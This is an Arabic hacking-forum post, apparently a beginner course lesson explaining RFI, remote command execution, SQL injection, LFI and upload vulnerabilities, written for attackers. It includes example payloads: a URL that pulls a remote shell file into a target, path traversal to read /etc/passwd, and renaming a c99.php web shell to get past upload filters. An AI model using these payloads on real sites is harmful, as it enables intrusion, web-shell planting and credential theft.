نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

 
 
أدوات الموضوع انواع عرض الموضوع
قديم 18/03/2010, 01:26   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

Thumbs up الدرس الثاني (شرح أنواع الثغرات ومفاهيمها)


السلام عليكم ورحمة الله وبركاته


وصلنا والحمدلله لدرس الثاني في الدورة وهي ((شرح أنواع الثغرات ومفاهيمها))

أنواع الثغرات وهي :

1- Remote File Inclusion إختصارها RFI
Remote Command Execution -2
SQL -3
Local File Inclution -4 إختصارها LFI
Remote Upload Vulnerability -5

امممم نبداء بشرح كلا منها

=================================================

النوع الأول هي ثغرة تسمح لك بسحب الشل من خارج الموقع الى الموقع عن طريق الرابط مثلا


كود PHP:
www.xxx.com/index.php?id=http://site.com/shell.txt? 
اذا كان الملف مصاب بثغرة include سوف يتم سحب الشل عن طريق وضع رابط الشل
خلف علامة = بعد الرابط يجب ان نضع علامة "؟"

اذا كانت الثغرة شغالة سيتم سحب الشل

اممم واحد بيسألني ماهو الشل ؟؟؟

الشل يا طويل العمر هو ملف مبرمج بلغة PHP ترفعه اذا وجدت ثغرة ويسمح لك بالتحكم بالموقع كاملا كأنك صاحب الموقع وسنشرحه في الدروس القادمه
لأنه اساس الإختراق من ثغرات الـ web application

ملاحظة : ثغرات include قد شارفت على الإنقراض وبقية منها 2% فقط من جميع المواقع على الشبكة

يعني لو الثغرة كانت موجودة لو شرحت عليها مع التطبيق

=================================

الأن نروح لنوع الثاني وهو Remote Command Execution

هاذي الثغرة تعجبني جدا وهي ثغرة تسمح لك بتنفيذ اوامر على السيرفر اوامر نظام التشغيل لينكس

مثلا


كود PHP:
www.xxxx.com/index.php?=id 
ذا كانت الثغرة مصابه سوف تسمح لنا بتنفيذ الأوامر بوضع الأمر بعد علامة =

انا وضعت الأمر id وهو الأمر الذي يظهر صلاحيتي على السيرفر وانشالله نفهم اكثر في الدروس القادمه

==================================

النوع الثلاث وهو SQL بالعربي تسمى ثغرات الحقن اي انك تحقن قواعد البيانات بأوامر لتستخرج منها معلومات قيمة جداا

مثل باسورد ويوزر الأدمن المخزنة في القاعدة الخاصه بالسكريبت

وهي الثغرة الأكثر شعبية واستعمالا الأن وقد تم الإطاحه بكبار المواقع مثل موقع الكاسبر سكاي و موقع مايكرسوفت بهاذه

الثغرة و سيتم شرح استغلالها وتطبيقها بشرح مخصص لأنها ثغرة عظيمة تحتاج لفيديو او درس خاااص

وتتواجد في أكثر من لغة برمجية كـ PHP و asp

==================================

النوع الرابع وهو Local File Inclution وهاذيه الثغرة تسمح لك بقراءة ملفات على السيرفر

مثل ملف etc/passwd وهو الملف الذي يحفظ يوزرات المواقع وطريقة الإستغلال هي


كود PHP:
www.xxx.com/index.php?=../../../../../etc/passwd 
وطبعا كما تعودنا بعد علامة = نضع هذا الإستغلال ../../../../../etc/passwd

ماذا تعني ../

هذي تعني خطوة للخلف اي اذا كنا على هذا المسار vb/includes ووضعنا هذا الأمر بالإستغلال ../ سوف يتغير
مسارنا لمجلد /vb/ مع الدروس القادمه سوف تفهمون انشالله كما قلت انه درس لفهم انواع ومفاهيم الثغرات
وطرق عملها

================================

النوع الخامس ولأخير وهو Remote Upload Vulnerability

وهي ثغرات مراكز رفع الملفات فبعض المرمجين الغير مباليين يسمح لك برفع امتداد php كما عرفنا انه الشل يكون ملف مبرمج
بلغة php اي امتداده ايضا php فهذا يسمح لنا برفع الشل مثلا شل بإسم c99.php

وهناك ايضا بعض مراكز التحميل التي يمكن خداعها ففي بعضي الأحيان نجد مركز رفع يسمح لك برفع امتداد

gif و jpg و rar و zip

فبذالك يمكن خذاع المركز بإعادة تسمية الشل من c99.php الى c99.php.rar او c99.php.gif

وسيتم الرفع و سأشرحه في درس مفصل مع التطبيق لووول

وبهذا ننهي الدرس لهاذا اليوم واتمنى انا اكون قد وفيت في الشرح



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH  
 

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 132
134-dz , 3bjo , 3ned , 4V3NG3R , abu-wissam , adminright , alex mex , almassiva , Anis Gladiator , attacker , azizou , A£K93 , أحمد العرجان , محمد بركة , محتـويني , نـــوافـــ , badrou-25 , binto , BlAcK EvIl , Black Nova , BlackMask , bn6a , cyber-crackers , ال بطيور , الهكر الاخلاقي , التنين الاسود , الديلر الفلسطيني , الصاعق , D3VIL H4CK3R , dark_maan , dazi , dekmo , Devil-_-H@CKER , dossdivnet , Dr.AnTi_HaCkEr , Dr.Terrible , Dr.xp , DZ-cOmbattant , dz.mimo , elmojahid , eror , Ev!LScR!pT_Dz , eXe+18 , بغدادي2 , fahadjehani , fartoto_dz2044 , ghawe hacker , googles , H.k.r.f15 , H3ll-dz , h4mz4 , hackxx , Haker Vip , hardhack , hero1983 , hk.Tyro , ib4dz , illuminat , injection , it is me , حكمي , حكوكو , jReMa-HaCKeR , kata23 , khalil19000 , khalilcool , kouki , laco22012 , lennix , liverpool_216 , m.mohammed , M3GO , Mafia Boy , mafiaboy , mahdi king bob , ManiMan43 , manssik , mark94 , marwane , MdMn HaCk3r , MouDy-Dz , moumouh206 , Mr-viros , mrk7015 , mr_badz , msiol , NaJi HacKer , napster , Nasser , netstat-41 , o0o , OXO , سلطان , سجين الوطن , سيف العراقي , P!CsO , patch , Pheonix , poster7 , Power_Dz , rampage , redacamp8 , S1LV3rS3rf3r , SaMI-php , saqeer , sazer_2010 , shadoow , Silver-39 , smart , SnIPeR-NJD , souf911 , stallin , sultan-f16 , T!frani-hk , TAMIMI506 , TaWaGNjD , The Fox , Thewama33 , totti , عامر شعري , عامرابوعمار , عبدالله الهاشمي , V.S , viomode , ViRuS Qalaa , ViRuS_Ra3cH , watchful eye , waxer , wXer , ymh , youpi97 , zinouiori
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
(حصري) الدرس الثاني : فيديو حقن قواعد MsAccess ViRuS_Ra3cH [ منتدى حـقن قواعد البيانات | Sql injcetion ] 25 14/11/2015 07:47
الدرس السادس : استغلال الثغرات والمشاكل التي نواجهها ViRuS_Ra3cH دورة الميتاسبلويت | SiLv3r00t 8 07/08/2014 10:57
تعليم الهكر من الالف الى الياء الدرس الثاني DR.X [ ارشــيــف الـــــــدورات والـدروس للـمـبـتـدـئـــــــيـن ] 23 21/09/2013 09:37
الدرس الثاني: شرح الميتاسبلويت وملفاته ViRuS_Ra3cH دورة الميتاسبلويت | SiLv3r00t 6 13/02/2011 21:30
تعليم الهكر من الالف الى الياء الدرس الثاني DR.X [ مـنتدى حمايه الاجهزة | Hacking Pc ] 3 19/08/2010 23:56

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 16:08.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115